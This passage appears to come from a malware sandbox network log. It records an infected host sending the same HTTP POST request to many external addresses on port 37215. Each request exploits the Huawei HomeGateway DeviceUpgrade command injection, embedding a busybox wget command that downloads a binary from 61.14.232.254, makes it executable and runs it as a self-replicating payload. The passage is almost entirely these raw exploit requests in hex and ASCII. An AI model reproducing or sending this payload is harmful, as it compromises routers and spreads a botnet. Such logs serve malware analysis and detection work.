                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1793192.168.2.13354345.134.47.23537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.631411076 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1794192.168.2.1351880178.158.179.1837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.631516933 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1795192.168.2.1349370191.215.67.22737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.631535053 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1796192.168.2.1334142157.11.148.23937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.631567001 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1797192.168.2.1340724157.63.95.24437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.631576061 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1798192.168.2.1338572157.161.46.9337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.631581068 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1799192.168.2.1358516157.143.40.20537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.631594896 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1800192.168.2.1341040197.76.11.937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.631622076 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1801192.168.2.135815641.109.195.23337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.631648064 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1802192.168.2.1357838197.92.243.15237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.631649017 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 